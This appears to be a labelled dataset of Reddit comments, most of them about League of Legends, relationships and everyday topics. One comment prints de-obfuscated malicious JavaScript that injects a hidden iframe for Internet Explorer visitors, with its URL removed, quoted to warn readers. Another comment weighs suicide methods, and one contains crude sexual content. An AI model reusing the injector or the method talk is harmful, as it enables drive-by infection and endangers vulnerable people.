0	Seriously, I don't get it.   If you know how to properly use Windows - you press the Windows key in W7 and start typing into the search box; it fills up with items and you press enter to load what you were looking for.  You don't click the menu and search for the item.  Windows 8 works the EXACT.  SAME.  WAY.  Metro is everyone's major gripe.  Guess what?  With these simple keystrokes you have just eliminated your need to interact with Metro.  All of the sudden it works just like your start menu used to.  The problem is the vocal majority doesn't understand how to use Windows efficiently.  Metro is trash.  No one is arguing that, but Windows 8 loads faster and has a bunch of other minor tweaks that makes it an improvement over Windows 7.
0	Definite homework hater here   In HS I never did homework   In college, I was an engineer with the highest test scores in every class I took. I never needed to do homework to understand the material. I refused to do homework because I wanted to be out at the bars enjoying life and I was too stubborn to play by the professor's rules. I got C's I almost every class because homework counted for 25% of my grade and I had nothing but zeros. I had to repeat one class because I got a D even though I had the highest test scores and people came to me for help.   I paid for my stubbornness  by graduating with a 2.2 and watching all the good, high paying jobs go to the people who passed with higher grades even though they didn't understand the material.   8 years latter got an MBA and was mature enough to do the homework.  (College is like the real world, the professor is your boss and even if he's an asshole, you have to play by his rules).  Graduated with a 4.0 and landed a job making 180k.
0	As a polisci major most of us are better than this and we all hate the dude who holds up every class with his "opinion" (that he read in that morning's alternet).   It's not that we're all stupid, it's just that they seek out our major because they think it's like a degree in complaining. It doesn't help that most universities don't actually teach political science; they teach theory. Political science is one of the most statistically intensive forms of social research. I'm failing out right now because of how terrible I am at math. If it was just an opinionated liberal arts major I'd be golden.
1	While I admit that my post-laning Vel'koz is a bit subpar, I've found Vel'koz to be extremely deadly in lane as you can often harass and cs at the same time with a well-timed w, e, or q and q+e makes you VERY difficult to gank. Honeslty, having played midlane against bronze 5's in normals, Bronze I all the way up to Silver I in S3, and Bronze 3 to Silver 5 in S4, I would say that most low elo midlaners are god awful at csing (I can be under constant harassment and zoning, rarely able to get in range to even attempt a last-hit which I will gladly admit I'm iffy at until around level 4-5, and still manage to easily out cs my opponent if they're not at least firmly low silver) and, well, until you hit low-silver they will just generally focus a lot more on trading skills (and generally being low on mana) with the enemy laner while trying to avoid enemy harass, but be vulnerable to early ganks, proper trading and consideration of creep mechanics and manipulation.   In other words: if you can last hit, get jungle pressure, or properly time your all-in you should be able to win lane pretty easily. With vel'koz, you honestly just need to know when to all-in. Hell, I've been killed by a vel'koz in lane simply because of a ping/lag spike letting him get a full combo off blowing me from nearly full health (I'd been dodging his skill shots and letting him take the free creep damage while mainly focusing on my own cs up until this point) to dead in the time it took my ping to come back down to normal (it really only takes, what, a second or so to get off a full combo and you can get a knock-up and slow in with that as well plus any ignites or AA's you need to finish). I love playing Vel'koz, but even as someone who'd already gotten in maybe 5 games with him by that point I was amazed by his ability to get down a little burst and with his relatively good mana regen versus mana usage it really just comes down to making sure you group and don't get targeted by any assassins or at least use a Zhonya's/have your team ready to peel as Vel'koz is very powerful if he can actually survive to get his damage off.
1	Ever since they nerfed his max HP at level one they effectively destroyed his laning phase. Over all I would say that Yasuo is one of the weakest champs since others (i.e. Riven) can do almost as much damage with having a much stronger lane phase.
1	Great move by Riot picking him up, shows they understand their weaknesses and actually try to fix them.   There really wasnt  any other caster so far apart from Jatt that actually knows how the game works. We 've had energetic and funny casters, but no casters with many hours spent playing league. And it actually shows. Just compare any game with a game where Jatt casts and you shall easily realise the huuuge gap between him and all the other casters concerning itemization, strategies and generally game analysis.
0	When we were dating, I forgot my (now) husband was lactose intolerant. It was cold out so I made us some hot coco with milk. Not only did he get very sick but he can no longer drunk hot coco with water like he used to because he knows what he is missing.
1	This is not setting a precedent to perform a witch hunt. This was a post to warn people about own3d. Both future streamers and viewers. Future streamers would like to be payed as well. And their lives, like Destiny's, depend on it. If a company is knowingly destroying people's lives, by not paying money that they own them, they deserve to get a public warning against them. Even more so, as a viewer I'll pay money and subscribe to a person's stream to support the streamer. I don't do that because I support own3d.   This means it's not solely in Destiny's interest to warn people about own3d. It's the entire community's interest. This means it's not a witch hunt. Destiny also provided sufficient data and evidence to back up his claims (skype logs, contract quotes etc). Can this evidence be falsified? Yes. But if so, it would only take 1 post from ow3d with their logs to undermine it. Own3d can provide a statement as well, just as much as Destiny can.   It doesn't matter whether this sets a precedent if it's something that's in the best interest of the community to know. It would be a witch hunt if Destiny posted this to pursue his own goals and his goal was to pressure them into doing something. It's not. It's about warning future streamers and viewers to be very careful with own3d. Destiny is trying to look out for the community, not for himself. therefor this should be widely known. Reddit is one of the ways to warn a giant portion of this community. It's not like Destiny is the first one warning about own3d. This stuff has been going on for quite a while now. It's been out there before, yet still nothing has changed.   This means it's fine if this sets a precedent. Because it's our interest at stake here. It's not like own3d can't defend themselves. They can. and the fact that they don't, says a lot.
1	what i like:  Fixed several issues that occur when reconnecting  Eve rework  Twitch rework  Xin rework  Parley now refunds half the mana cost if Parrrley kills the target( he needed it)  Malphite nerf(hopefully ill be able to stop banning him every game)  Malzahar changes(voidling dance op, god tier for sure)  Shen ki strike nerf  Xerath (now playable again)   what i dislike:  R.I.P AP Trist, you will be remembered  gold item nerf( Mid and top are starting to use them so lets nerf if for eveyone including support and jungler rather than making them sell for 0 to prevent people stacking them without actually upgrading. )   Neutral:  Nocturne ult nerf  Morg black shiled(the nerf was fine but why increase the range...)
0	Absolutely. But only if you link to a screenshot of me giving you permission in the comments. After that is done, we then have to go to the founder, /r/Lighetto , and post a screenshot of him giving permission to let me give you permission in the comments.
1	just disable chat in ranked games, problem (mostly) solved.   The ping system should be enough, maybe add 1-2 more things to it and it's more than enough communication. No need for chat.   Without a chat, there will be no more rage and no rage-inducing comments.   This video won't change much, a 12-16 year old's (most of your ragers and toxic players fall into this category) behavior can't be addressed by a simple video that most won't even watch.  To be honest, some will even troll more , just in spite and because they think that everyone (even Riot) is against them.   That's how puberty works for adolescents, you start getting rebellious and everyone sucks, except you.   **
1	that is because like 30 people play them(lets be realistic) and this means winrates ARE VERY CHANGEABLE for those champ, old sej proir to he rework once had the highest winrates as well, did that make he viable or popular, no, she had 0 use compared to naut or maokai or j4 at the time, its about how useful a champ can be vs other top teir champs NOT THEIR WIN RATES only sometimes win rates mean good but shen was literally a top proirity pick in solo queue and competitive for 2 years and he had ~52% when he first got popular and then fell HELL HE FREAKING HAD A 44% winrate and was still pick banned in most games in competitive and was still freaking popular in solo queue
1	I would tend to agree with what THESE people have said: there are no BEST, but there are some better than other. My personal mid choices are Gragas (game breaking aoe burst and ult, tanky, lots of sustain, and a BELLY FLOP). Morgana (CC out the ass, dat shield, passive sustain, amazing roamer, free lvl 6 kill if you are good). Zyra (STUPID damage. Like...wtf damage, great utility with her seeds, being able to ward for free is nice. FUN) Ryze (retarded damage, burst, aoe, tanky, and easy to play well). My last pick for mid is Elise. She isn't borderline OP like Morg or Ryze, and she builds weird, but once you figure her out, she is really strong, even though her teamfighting isn't as good as the others mentioned here, her roaming and midgame is silly.
1	I'm really glad this is being implemented as its own queue, I do have times where I'll really really want to play a certain champ, but it is either banned often or too against the meta for my team to get along (or I simply might not get that role).
1	I agree with pretty much everything you said, since it's pretty much all fact, haha, except for the part about Rammus. If Rammus is an issue, you want merc treads for the MR + Tenacity rather than Zephyr, especially since Zephyr doesn't provide any defensive stats and doesn't help much vs beef.   If you're going to build a Zephyr, it's likely going to be in combination with either Swifty Boots or Ninja Tabi, depending on what you're dealing with. If you want Zephyr specifically for the tenacity, I'd recommend going Ghostblade + Merc Treads instead since the avarice blade part of GB will help you to, slightly, catch up in gold and MR is pretty much always nice to have unless enemy team is all AD, in which case feel free to go Zephyr + Nin Tabs. In fact, Zephyr + Nin Tabs is perfectly fine to get AFTER Tri Force if the enemy team is all AD, in my opinion. And... actually I think I'm getting off topic. I'm sure no one cares that much about my opinion, so I'll stop here. :)
0	That's pretty normal. I'm active in what you might call the 'alternative sexuality' subculture and wanting to be friends with who you fuck is a non-gendered recurrent theme.   I also wouldn't listen to others saying that "You're a girl, therefore it should be easy!" No one else can tell you what your experience is like, you happen to be the world expert on knowing what it's like to be you, after all! :P   All I'm saying is if it's tricky for you, don't let others invalidate your struggles simply because they can't believe it.   And you're not alone! I have a female friend who subconsciously avoided sex for over a decade. She woke up one day, realised what she'd unintentionally done and decided to make a conscious change.   Now she works as a prostitute and gets all the sex she wants without having to stress about whether or not someone is actually flirting with her or just being nice! :D
0	It's a sign of the times. If you're younger than 25 you probably don't remember the Bill Gates who ruthlessly ruled at Microsoft. MS was a feared giant who would stomp on their competitors throats no matter how small or large they were.   There was a lot of carry over feelings in an older generation from those days, however, Bill Gates has since done so much for the world with his foundation. The intensity he once put into crushing his competition is now put into crushing polio, malaria, famine, etc which is why he is able to achieve so much where others were stagnant.   Steve Jobs on the other hand had always been the same, a hardass with unflinching standards who was a fantastic marketer and visionary (though his vision of the future of computing was vastly different than Gates).
1	I used to main Udyr so when I discovered a high-level streamer that was entertaining and who played him very well I was ecstatic. I learned a ton from watching Trick play and I can quite confidently say that I know his limits very well, and I would say that mechanically my phoenix-jungle Udyr is at the same level as Trick. My knowledge of the game, map awareness and top lane skills are much worse which is why I'm still in silver 1.  Point being : he's a great source of entertainment and has a lot to offer if you don't imitate his play-style but instead learn from his thought process on how to gank, when to push, all these things.  Fans/Followers : please be aware that he's only "MAXIMUM DISRESPECTING" because he developed his own playstyle that works for him, that he's incredibly comfortable with and has mastered. This is not your playstyle, you do not have 500+ games with a champ yet.
1	Agreed completely. He went from being one of the most fluid champions in the game to feeling outdated.   inb4 "it's OP and needed to be nerfed!"   Why not just nerf his numbers then? Casting W mid-air was awesome and made you feel like a badass. I think most players would be fine with Kha'Zix damage nerfs if it meant we could have this mechanic back.
0	I think it's just that the formula grows stale, so there's not as much of a click in your head that there is when something is truly novel and funny to you. Clearly, we are seeing evidence that these memes are still funny, but it's not the same for us anymore.   A relevant anecdote: I stepped out of the "intarwebs" game for a while. From late-2009 to late-2011, I didn't look at sites like reddit or 4chan. You would be surprised how much I missed: the birth of many "advice animals" like GGG and SS, the explosion of Rage Comics outside of 4chan, and of course many other passing fads or continual success of more familiar ones. One thing that was completely new to me when I re-entered the scene was "autocorrect fails." I read a few composites somebody made of these failures and practically passed out laughing, let alone crying. Something about them just struck a cord, making me laugh with more intensity than I had in a long time, and haven't since. Unfortunately, I soon realized they were all fake and grew tired of them very quickly.   It's strange and sad that what we find so damned funny one minute can eventually not even make us grin. Laughter is a more profound and complex cathartic experience than people like to credit it, meaning that the death of humor for you can almost feel like heartbreak when it was something truly great.
0	Some people define it as the same issue.  That is the problem.  Define death.   I have always thought of death as the stopping of a heartbeat.  So, I consider abortion to be murder around the 6 week mark because that is when a heartbeat starts.   Others say you can't die until you are born, so for them abortion is never murder. What is being born though?  If the baby is "halfway" out can you still abort it or would that be murder?   Others define death as the ceasing of neural activity so for them trimester 3 (~ 6 mos. when neural activity starts).  If death is the absence of neural activity than some people in comas/on life support should be considered dead (true of the heartbeat thing too, I admit).   I think it is perfectly acceptable for any of these people to advocate their stance publicly.  They believe murder is occurring everyday unpunished, and believe it is tragic.
1	Sry for bad englando, pls don't copperino pastarino.   Now to your topic. What helped me getting along with flaming teammates, is to simply ignore them. If their verbal abuse feels disruptive to your gameplay then don't bother ignoring them. That's why Riot implemented that nice little button when you press Tab. There's a reason why people say: "Don't feed the troll." If you even show the slightest bit of reaction to their misbehaviour, they will shitstorm the hell out of you. It's exactly what they want. They want you to give them anything they can use as a reason to flame. They want/need the attention. So even by telling them sto be quiet in a polite way, you show them that their flame actually bothers you. And that encourages them to continue on and on.   Hope that helped a bit.
1	Webdev here.   Basically the site loads up a javascript file (based on a popular javascript from Twitter), which unfortunately has been injected with  malicious code . The malicious code is  embedded directly in their website . That's bad.   Parsing the obfuscated code, I get the following:   if (navigator.userAgent.indexOf("MSIE") &gt; 0 ){     document.write('&lt;style&gt;.jz97521lox { position:absolute; left:-1104px; top:-1792px} &lt;/style&gt; &lt;div class="jz97521lox"&gt;&lt;iframe src=" width="172" height="132"&gt;&lt;/iframe&gt;&lt;/div&gt;'); }    The above code injects an iframe (subpage) into the current page, which loads up the URL you see above and then infects your computer with whatever.   Note that I've changed the URL above a bit, so no newbies check it out from curiousity. The original does have malicious code and AntiVirus software will detect/block it. The code above is also mainly targeted towards Internet Explorer users as the security with IE isn't as high as the other browsers in some rare cares.
0	Great, you've found one website with some research data, that must mean it's the answer to all porn-related questions!! Or not.   What you are saying is just plain wrong and very short-sighted. Of course, n3rfh3rd3r's example  IS  actually similar. Action movies do depict stuff that people want to do (no shit! can you imagine that, there is actually a reason why people watch these things). Or you have forgotten about all the freaking violence that's essentially in every fucking action movie out there. Murder, death, murder, death, death, blood, guts, guns, knives, and more of that. But hey, how do you expect all of those innocent violence-watchers to know what it's REALLY like? No, please, you are making complete sense here. Of course it's much more important to ban the extremely harmful, terrorist-breeding fake rape porn, rather than the fucking fuckatons of violent media that's out there, for anyone to enjoy.   So yes, it's not exactly similar. Why? Because porn is not actually harmful. To anyone, except weak-minded people who will eventually go crazy about anything, really, not porn in particular. I started watching porn when I was 6 or 7 years old, I am not quite sure. It must have made me so confused!!!! UK, please save my gentle and fragile virgin soul. Only that's not how it went down. By the time I started having sex I've already known about the hundreds of possible things you can do in bed. But that's not how real life sex is like, you say? I say you can go fuck yourself, I am the one who says what my sex life is like. And if I want to I will watch a 100 of rape vids and then go 'rape' my gf, and she will be fucking happy about that as she has been before.
0	Yup!   I go to the machines because its quicker for me to check myself out, and better for me to bag my things myself.  If I bag it myself, stupid things don't end up together (like cold items in the same bag as cardboard, that will end up soggy cardboard by the time I get home).  When I was a cashier (about 17 years ago, so not terribly long ago), I had to memorize things like produce codes, I would get in trouble if I bagged things badly, I couldn't basically toss food down to the bagging area without getting yelled out, etc.   I feel like an old guy saying 'back in my day', but you know what? A lot of cashiers today suck at their jobs.  I'm not going to go to them just because they need a job, I should be going to their lane because they make my life easier than the a machine where I end up doing all the work.
1	I'm not a poet by all means I am much worser than it seems My life is bright, i want to say I's cool that you give stuff away   And i could use that TF skin Because it's rarely to be seen No matter what you choose to do I will be fine, i'm proud of you   From all the players, on their part I want to thank you from our heart Kind people are the gold of world Care for them deeply, i was told
1	To answer the question: You can never be "Late" to try something new. For anything in life.   It may be overwhelming at first, but if you keep and open mind towards the game and it's player base. In the beginning, you have only a select few champions to pick from and every week it rotates, so as you play you can pick a champion for every role and try a lot within a week. Items are recommended by default, and there are pro-guides out there to help you with choosing what is the proper build path.   The "regular" games are exciting, and you will only rage quit depending on how you take your games. If my team is losing, or trolling I try to keep my head up, and even though it's a loss I try practicing my mechanics on champions and pursue strategies for future games.
1	Because DotA is a much older game with far more lessons learned in development.     Because DotA's system for balance revolves around items, counter picks, and synergy picks.     Because DotA's items fill niches and so many items have actives as powerful if not more powerful than most individual abilities. There's no core, calculated build for roles in DotA (compared to LoL's trend of having "the build path" for AD carries that has max-dps calculated in, or S1 always rushing Zhonya's). Items create answers for strategies in DotA.     Because DotA heroes aren't given everything. Most heroes have 4 skills with no side effects (shut up about Oracle, I know that shit is crazy). This leaves a lot of holes in their kits and leaves actual weaknesses.       Edit 5. Because DotA's map is amazing. It leaves so much more room for strategic decisions and variations than League's.   Many of Riot's champions have all these added bonuses and sides to their abilities. Like Zed's W giving bonus AD, Yasuo's W making him generate his shield faster, Jinx gaining range on her AoE attack, etc. These bonuses can remove the weaknesses in a champion's kit. Popularity in League often feels like "use the champions that have the most, because they just get to do more."
0	Yeah, I understand and you're right about the credit. (Though generally I don't care about karma, so that's whatever.) I'd rather just provide something to maybe get a small laugh or smile out of someone. I mean, like half the people on reddit don't read comments anyways and may have missed out on this.   Problem is, I was on mobile when I posted and linking neatly in comments is a bit difficult on my phone; I left the post for later. I came back to it right before it exploded and saw /u/americon commented about his post, so I said that was where the idea came from. Thought all was well and left it at that.   Nope. Guess not. I come back and see people are upset and someone has provided a link directly to comments which I had read. At this point I realize the former action wasn't enough, but whatever, there's a link now; I thank the link provider and move on with a joke. Everything's cool now I think.   Nope. Nope again. People are still upset at this point, but I guess there's nothing more I can do now. Ah well, kindness can only go so far before it gives up. I've still upvoted all the comments here for contributing to the discussion though, so I've got that going for me.
0	It suck doesn't it, I recently chickened out of suicide twice in one night. I am not afraid of dying, I am afraid of trying and living afterwards. Chances are, attempted suicide doesn't kill the victim, most likely they will live but with long term consequences. I thought of using carbon dioxide but that can lead to brain damage. Falling from a high height can leave me crippled. Using a firearm can cause the gun to misfire and destroy my face.   Besides for the long term health risks, I also wouldn't want to put on suicide watch. Having my every action monitored would be hell and I would have to deal with psychologists, family, and friends giving me lectures on the importance of living.
0	I have the $60 unlimited everything plan with MetroPCS.   Their APN connection would give me dead spots in areas where my previous Tmobile connection would not. After learning Metro is running off Tmobile towers now, I decided to try connecting with the Tmobile APN settings.   Not sure if it's supposed to work or if I got lucky, but my service is a lot better now. Plus the bonus of paying much less for the same coverage and speeds as before.   If you have this option in your area and Tmobiles coverage is at least decent, $60 flat is a very reasonable price for what you get.
0	Ok. I'll share my madness so hopefully she will seem a saint and a pregnant goddess now :)   The first trimester with each girl I could have easily plucked his head off his shoulders and smashed it and not cared. There was so much hate and evil in my blood   With the 2nd my 1st was 8 months old when I found out I was pregnant  After contemplating suicide and abortions I ran through every bad side affect of having siblings close together.  The affects of a miscarriage on my then infant should I tell her about her sibling and lose her   THEN  We had the Ppd / OCD / anxiety  Which was just  Awesome  I stayed awake til 5-6 am wondering what I would do if there was a flood and I was alone and how would I get them out ( we are on the 2nd floor and a high elevation )  And I would check on them 10-20 times a night to be sure their windows were locked and I knew what PJ's they were wearing bc WHEN they were kidnapped the cops wouldn't help me unless I could tell them what they had on - their exact height and weight and hair eye color   There's nothing that makes sense. And looking back after loads of Zoloft - I was freaking insane - bit it was all so real then
0	Well, it is my belief then, that you are an idiot.  You not voting is you forfeiting your right to do so.  You are willingly giving up that right because you don't agree with a two-party system?  Well, as an American, I'd damn well rather live here and vote on two career politicians who take corporate corruption into their hearts to reach their position than move to a country who doesn't allow me any say in my governance.   I do agree that it sucks.  Having just 2 parties to choose from forces a lot of compliance and a lot of compromise, but it's also very difficult to uproot a political system that has been in place for so long and that has been widely accepted by the general populace, especially when that populace takes a similar stance to you and refuses to attempt to make a difference.
0	This has been my philosophy, and I'm much happier for it, mostly.   The one time it came back on me, was loaning $1500 to a friend to get her car fixed. We had it, didn't matter at the time.   Fast forward to 6 months later. I lost my job, we really needed money, and she inherits a ton of money from an uncle, tells us almost immediately that she's gonna pay us back when she gets it.   She disappears (to us) shortly after, ends up taking ALL of her party friends to Corpus Christie on her dime, gets arrested, has to make bail, gets a huge fine (so we heard). She stopped talking to us even though she had been best friends with my wife and even lived with us for a while when she fell on hard times.
1	In my opinion, Riot should simply put a difference between a banned account,and a banned player: For example they could have banned Linak's and Envision's account,permanently if required,okay. But EVERY other person then a pro player can just make another account,play,and correct or not correct is behaviour. Putting this in public is just a problem for the banned player AND his team. By the way,comments like : they should just not group up with such scumbags/cunts are wrong: there is a HUGE difference inbetween their behaviour in SoloQ and in a Team. ( I honestly hope so for the teams) Now,I know aAa better then mouz so I'll take this example: Why would Riot, First, Tell the world who they banned,Second,ban the person "Damien Lorthios" ,and not the account(s) from aAa Linak? As OP said,aAa has now to find a new jungler,because Riot didn't tell them that their player got banned for 1 year from the official SCENE,and not only the game? That is just a  bad method to keep toxic players away.
0	Something similiar happened to me this past weekend. After a party i was downstairs putting on my shoes as i noticed the host speaking to the couple who just moved in down stairs. It was my birthday so they started congratulating me and so on and then the host went on to ask if we were too loud. I then think it's a good idea to throw in "well, I'm sorry if i was loud" but I get cut off half way through meaning they only heard "well, I'm sorry!" with a really sarcastic tone.
1	Make sure you buy it from when to 50% off sale comes (22nd of January).   The IP boost is only worth buying IF you play 6+ games a day. If you buy it 50% off it will be worth when you play 3+games.
1	from my personal experience i would say that orianna definitely has the 1v1 advantage especially pre 6 but even after i would say that it is the orianna's lane to lose. Morgana bind cant go through minions but if you land a bind you will win trades on ori but the problem is actually being able to land one, other than binds morgana basically has zero ways to harass orianna where as ori can just q w e aa morg all day. If i see this matchup as a jungler on either side i would understand that it is primarily a jungler influenced matchup because morg has enough sustain to stick around before ori gets items and ori is hard to touch with morg alone.
1	No.  Simply put, no.   There will always be factors outside of your control.  But people overestimate how much this is--by far.   Let's use the typical analogy of "what would happen if a pro were in your game."  /u/iyfSilencer estimated that "in about 10-20% of all matches you will lose no matter what you do."  Well, the obvious retort is that Faker wouldn't.  He'd win about 99.9% of Silver or Gold matches he played, and he'd probably win 90% of games at low Diamond.  Or something like that.   Obviously, you're not faker, I'm not faker, etc.  But the point here is:  you may think you're doing everything you possibly can, but you're not.  Not even close.   There are  always  things you can do to play a situation better, and you have to keep going with this mindset.   The moment you attribute failure to outside sources, you stop improving.   This is definitely an oversimplification, but you want to err on the side of looking for ways to personally improve rather than blaming others, both in League of Legends and in life.   The key word in this question is "consistently."  No, it is not possible to  consistently  lose because of factors outside of your control.  The reason why playing in lower tiers can be so frustrating is actually simple statistics.  If you're in Silver 1 and you are "good enough" (whatever that means) to play at, say, a Gold 3 level, then you might win about 60% of your games.  That's pretty far above 50%, but it might not feel like it.  It'll take you quite a few games to rank up.  Add to the mix the outside factors that you cannot control--AFKs, weird picks, refusing to ward, trolls, etc--and it can very quickly feel like your quality of play doesn't matter.  But it does.  What you need to do is get  significantly better than where you are now.   Being "good enough" to play at a Gold 3 level isn't going to make it easy to get there.  You need to work on your individual play until you can go toe-to-toe with mid plats; then you might win 70-75% of your games in silver, meaning that it's much easier to get to gold.
1	I'm talking balancing in general. I think if Riot is going to sell champs individually (unlike dota or hon where you get them all to start with), they better be keeping up with afterservice on all those champs by keeping them balanced/viable. Something like Heimer is anything but viable and viewed by community as a troll pick, and Riot won't do anything to compensate people who paid for that champ - IMO that is pretty unacceptable business attitude, because they're saying "Fuck you and your old champs, we just don't care".
1	My build is mostly start with dorans, on your first back get a tear and (depending on your gold and wether your flash is up or not) another dorans or boots, then get a brutalizer. After that Id recommend you building a defensive item, frozen heart, banshees veil, spirit visage or randuins (in your endbuild it should be veil and heart OR omen and sv, to not overcap too hard on cdr, if you have like 9k gold spare, then go for 2 defensive cdr items). Then finish manamune (you can also finish that one after the spectres cowl or glacial shroud) and the cleaver->another defensive item->last whisper. You could even build a frouen fist or triforce last. Obviously start and max Q first, second skill to max is w 95% of the time. Set up ganls with its slow. You can spam your q quize a bit before your first back, but dont spam your w and e, if you have ~300 tear stacks you can use those more often.
0	Every post involving an engagement ring has a dozen or so comments about how stupid and common diamonds are.   Why is the fact that diamonds are common even a talking point? People know they are common, there is a demand, so they begin to cost more, and more, and more. If people chose to get an engagement ring based on their birth stone (as is usually the "innovative" engagement ring revelation that is talked about) the cost of those (already expensive) gems would increase beyond the current cost of diamonds.   I know De Beers, blah blah blah. The fact is diamonds are common, hard, have good tenacity as compared to other gems and have a high dispersion of light, which makes them relatively pretty to look at.   Just because some girl picks a different piece of whatever to put on their engagement ring doesn't make them more creative/intelligent/progressive.
0	I worked with a girl who did this to her boyfriend. I have rarely seen her level of crazy in the decade I last worked with her.
0	I have been with the same person for 15 years and this is so, so true.  We work in the same field and lately, as our careers converge we have been helping each other through stressful times at work with an enhanced appreciation for what we are going through.  I have always applied this to our personal lives, and just recently, it dawned on me that the best way for me to help her when she is suffering from work stress is to do the things that she does to help me.  It has made us both much happier helping each other.
0	I see this stuff on Reddit a lot but have never had the problem in life myself or heard of it happening, in the UK pretty much everyone at university moves into a house with some friends, and it seems to work fine most of the time. The worst that I'm aware of happening is that one person turns out to be annoying to live with in some manner, nothing big.   Either the people saying this stuff on Reddit exaggerate a shit tonne or they're the annoying one in your average house. The adult thing to do is to tell people if they're doing something that's bothering you when you live together, and them likewise. If you're not childish most issues are easily fixed.   I've only been at uni a short time so I haven't experienced everything, but my house has had a larger than usual turnover of people because various international students on short stays rented a room off my friend, who owns it and lives in it with us. If a Brahmin and a rabid carnivore can share a house and like each other most issues are resolvable imo.   And my brother lived with someone who is still one of his best friends years later.   I feel that if you're not a social pillock or a massive arse then living with friends is going to work fine, and the more your interests align the more fine it'll probably be. Anyway I've rambled a bit but I hope I got my point across.
0	My Dad bought my Mum's ring while they were in med school. He came from a really poor background too, so he had virtually nothing to spend on the diamond. It's tiny, but has so much sentiment that when he offered to buy her a nicer one a few years ago she refused.
0	Let us add all of this up.   The time it takes to tell each individual episode orally to his kids would obviously be longer than the episode itself, so even if each episode is half an hour long, it was take at least 45 minutes to describe the story of each episode with even basic detail.   There are currently 184 episodes, lets say they last 20-25 minutes a pop. That means the total amount of time Ted has spent telling this story so far has been: 4600 minutes = 76 hours, 76 hours = almost 4 days.   Any sensible teenager would have walked away at that point but Teds children havent, most likely due to fear of a violent backlash emerging from their fathers violent nature which comes from seeing one of his best friends happily coupled since college, his other best friend nailing everything in sight only to eventually be married to the woman he once loved while Ted himself has suffered years of failed relationships.   He has sat his children down and forced them to listen to an extremely long diatribe in regards to their own origin and the reason behind Teds suffering, most likely Ted wishes to give them an understanding of the reasons behind his actions in order to justify killing them as they are a result of years of pain and anguish, they are the fruits of his suffering.
1	Let's start a witch hunt against triggs390 he's obviously being paid off by own3d.tv   The destiny thing is obviously not a witch hunt also with other streamers like dyrus, husky, and other prolific streamers confirming that this happens. It's a call to action to help stop this since the streamers themselves can't do anything since they don't have the money to take them to court. We need justice.
0	A lot of sports also require skill and you have to practice and work to improve your skill: archery, golf, and shooting just to name a few. And sure the Olympic Games isnt a good example of everyday real life events but a competitive sport is a competitive sport and if you practice and work hard and excel above your competitors you deserve to be rewarded more than your competitors for your hard work and effort.   If youre not into sports then lets look at academic competitions. If you want to win a spelling bee you have to study. And when you study and youre the last one standing you deserve that gold medal. If youre second or third last person standing you deserve that silver or bronze. Everyone else deserves a Thanks for participating. Keep studying and next time you might get that top award.   If youre not into sports or academia but youre a hard worker and you work harder than everyone else then a good boss might give you a bonus at the end of the year or at the very least some sort of recognition. Everyone else who worked to rule got paid for their job and thats all they deserve.
1	i usually just listen to my favorite music, like pumped up music, and just take the games as practice, to make myself better, if i'm good at laning, i wanna get good at map awareness, or warding, or looking at what my team is doing while csing, maybe you can help your team not feed by paying attention to them as well. multi task is hard but it can help. IF you look to win every game, you will just get mad easy.
1	In this video, if you look very close enough, the blind is only fading and Nasus is still blinded when he begins the aa animation. Honestly, if you wanted to make the change that blind worked off of the end of the aa animation instead of the start, it would make him stronger.   The reason for this, is right now, if Teemo tries to trade with a ranged champ, the ranged champ will get one auto attack AFTER the blind hits that is still registered, thus making the trade slightly more even. If it is changed that auto will not go through which would result in Teemo getting his blind auto combo and being able to back out without taking ANY damage.
0	This. Even if he did live in an area where there is a large gay social population, most of the ones that go out and are social are younger (in their early twenties to mid thirties). Just remember /u/Phaesus, you can still be yourself, even though you're out. I am sure I can figure out how strange it can be for a recently uncloseted older gay man. When I used to go to the gar bars with my friends, most of the older men there were creepers who gave off weird vibes and tried to get my friends to blow them. Not cute. However, you may be able to get in touch with some other older professional gay men through social websites. If you live near a big town (like Cincinnati or Los Angeles for example) check out their subreddits to see if there are any activities going on there. If you are from a smaller town (like mine) check something like Adam For Adam (I am guessing you might know what that is) I don't know what all you can search for on A4A but I am sure you can probably find people that are around your age that do want to hang out and do more than just hook up if that's what you are into.
0	I agree that there should be a middle ground. My parents never talked about money around us when we were kids and I thought money came easily. I even saw a video of me on Christmas saying "that's it?" After I opened all my presents.  I was disgusted with myself. I'm glad I grew out of that quick. And from my senior year, entering college, my parents started to tell me how it's really hard to send me to college and told me how they don't know what they're going to do. It makes me feel guilty for going to college and wanting a better life for myself. Both my parents and I have worked on getting me to college since I was a kid. We are making it work now though. They haven't told me the details but they said they figured something out to make it easier on them. Money is a touchy subject. And I think perhaps that middle ground is something like making your children work for their allowance or something like that.
0	When my school first decided to switch it did seem like a terrible idea. However my personal experience with them wasn't nearly as bad as I thought. Turns out there are a lot of good apps that make taking notes effective and easy (personally I use notabillity) and for students who are dyslexic or ADHD (like me) being able to type and have all of the content for school in the same place actually makes it much easier to manage. now the obvious downsides are still apparent but in my opinion and personal experience they were a positive effect on my ability to participate in class.
1	It said Piglet will be benched for week 5 getting replaced by Keith it said that they had issues with the language barrier and xpecial was not happy because they had trouble communicating.
0	Looking back, I just don't understand the negative stigma attached to being adopted. As an adopted child, I would always keep that part of my background to myself, as I would hear other kids my age poke fun at adopted children for being "stupid" or "unwanted". At a young age, much like most other kids, all I ever really wanted was to fit in, and I saw that as just another thing that set me apart from everyone else. The fact that a teacher would add to a child's insecurities is pretty despicable. Fortunately, as I got older, I realized being adopted was nothing to be ashamed about, but actually something to be grateful for. I may have not had the most "normal" upbringing (who has?), but I'm a hell of a lot better off than I would have been if I'd have bounced around foster homes my entire childhood.
1	Im probably going to catch a lot of flak for this, but I know Gleeb isn't the problem with TSM. Sure, this game he didn't play awesome like he normally does, but he had a lot of key bindings that saved TSM from losing. He pretty much nullified the Westrice tp mid, kept Westrice from diving to the back line a lot, and IMO most importantly landed the biding onto, again, Westrice when they pushed the top lane inhib. This binding caused Bubba to burn his Mikael's in order to save Westrice. This means Bubbs didn't have it for when Gleeb landed the binding following Bjersen stun onto pr0lly and killing pr0lly. IMO, this caused them to finally close out the game.   The real problem is with Amazing. He is known for his Lee Sin, it is his most played champ, and Lee Sin is extremely early-game oriented. The problem is that Amazing consistently, regardless of champ, makes one move early that puts TSM slightly ahead and then just farms for 15-20 minutes. He was able to steal the red from Kez, but with a buff advantage was still unable to get off a single successful gank during the first 25 minutes of the game. Kez, on the other hand, was able to go top to a lane that was already winning and grab first blood on Dyrus for Westrice. This put the already winning top lane further ahead. Meanwhile, Amazing walks into lane bot, takes some CS, and goes back to farming.   Again, IMO, the only good things he did that game were secure almost uncontested smites and have that one kick where he q'd to a minion and flashed to kick Westrice back and snag a kill.   TSM was known in the past for relying on laning phase and early advantages to snowball into a win. They were able to pull 